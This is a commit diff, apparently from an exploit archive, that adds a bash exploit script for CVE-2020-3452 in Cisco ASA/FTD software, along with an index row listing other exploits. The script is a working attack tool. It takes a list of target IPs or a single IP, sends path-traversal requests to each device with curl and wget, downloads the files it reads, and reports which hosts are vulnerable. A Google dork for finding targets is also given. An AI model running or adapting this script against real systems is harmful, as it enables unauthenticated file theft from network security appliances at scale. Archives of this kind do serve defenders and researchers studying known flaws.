DB: 2020-07-29
1 changes to exploits/shellcodes Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion
This commit is contained in:
parent
720fabd066
commit
d8411b6613
2 changed files with 97 additions and 0 deletions
96
exploits/hardware/webapps/48722.txt
Normal file
96
exploits/hardware/webapps/48722.txt
Normal file
|
@ -0,0 +1,96 @@
|
|||
# Exploit Title: Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion
|
||||
# Google Dork: inurl:/+CSCOE+/
|
||||
# Date: 2020-08-27
|
||||
# Exploit Author: 0xmmnbassel
|
||||
# Vendor Homepage: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86
|
||||
# Version: Cisco ASA Software >=9.14 except 9.11 Cisco FTD Software >=6.2.2 and 6.2.3,6.3.0,6.4.0,6.50,6.60
|
||||
# Vulnerability Type: unauthenticated file read
|
||||
# CVE: CVE-2020-3452
|
||||
|
||||
|
||||
#!/bin/bash
|
||||
|
||||
|
||||
read="%2bCSCOE%2b/portal_inc.lua"
|
||||
|
||||
|
||||
helpFunction()
|
||||
{
|
||||
echo ""
|
||||
echo -e "\t\tCVE-2020-3452"
|
||||
echo ""
|
||||
echo "Usage: $0 -l targets.txt -r %2bCSCOE%2b/portal_inc.lua "
|
||||
echo -e "\t-l for list of IPs in text file"
|
||||
echo -e "\t-r file to read, default: %2bCSCOE%2b/portal_inc.lua"
|
||||
echo -e "\t-i for single IP test"
|
||||
exit 1
|
||||
}
|
||||
|
||||
while getopts "l:r:i:" opt
|
||||
do
|
||||
case "$opt" in
|
||||
l ) input="$OPTARG" ;;
|
||||
r ) read="$OPTARG" ;;
|
||||
i ) website="$OPTARG" ;;
|
||||
? ) helpFunction ;;
|
||||
esac
|
||||
done
|
||||
|
||||
|
||||
|
||||
#if $website is empty or $input is empty
|
||||
if [ -z "$website" ] && [ -z "$input" ]
|
||||
then
|
||||
echo "Some/all of the parameters are empty";
|
||||
helpFunction
|
||||
fi
|
||||
|
||||
#usage
|
||||
|
||||
|
||||
if [ -z "$website"];
|
||||
then
|
||||
while IFS= read -r line
|
||||
do
|
||||
name=$(echo $line | cut -c9-19)
|
||||
#echo "testing $line"
|
||||
filename="$name.txt"
|
||||
#echo $response
|
||||
status=$(curl -LI $line"/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name="$read -o /dev/null -w '%{http_code}\n' -s)
|
||||
|
||||
if [ $status -eq "400" ]; then
|
||||
echo "$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read doesn't exist!"
|
||||
else
|
||||
wget "$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read" -O $name.txt
|
||||
|
||||
if [ -s $filename ]; then
|
||||
echo "$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read exists, reading $read..."
|
||||
echo "downloaded!, $line is vulnerable to CVE-2020-3452."
|
||||
|
||||
else
|
||||
echo "not vulnerable!"
|
||||
rm -rf $filename
|
||||
fi
|
||||
fi
|
||||
done < "$input"
|
||||
else
|
||||
|
||||
name=$(echo $website | cut -c9-16)
|
||||
filename="$name.txt"
|
||||
|
||||
status=$(curl -LI $website"/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name="$read -o /dev/null -w '%{http_code}\n' -s)
|
||||
if [ $status -eq "Bad Request" ]; then
|
||||
echo "$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read doesn't exist!"
|
||||
else
|
||||
|
||||
echo "$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read exists, reading $read..."
|
||||
wget "$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read" -O $name.txt
|
||||
if [ -s $filename ]; then
|
||||
echo "downloaded!, $website is vulnerable to CVE-2020-3452."
|
||||
else
|
||||
echo "not vulnerable!"
|
||||
rm -rf $filename
|
||||
fi
|
||||
fi
|
||||
|
||||
fi
|
|
@ -42964,3 +42964,4 @@ id,file,description,date,author,type,platform,port
|
|||
48715,exploits/php/webapps/48715.txt,"Virtual Airlines Manager 2.6.2 - Persistent Cross-Site Scripting",2020-07-26,"Peter Blue",webapps,php,
|
||||
48716,exploits/ruby/webapps/48716.rb,"Rails 5.0.1 - Remote Code Execution",2020-07-26,"Lucas Amorim",webapps,ruby,
|
||||
48720,exploits/php/webapps/48720.py,"eGroupWare 1.14 - 'spellchecker.php' Remote Command Execution",2020-07-27,"Berk KIRAS",webapps,php,
|
||||
48722,exploits/hardware/webapps/48722.txt,"Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion",2020-07-28,0xmmnbassel,webapps,hardware,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue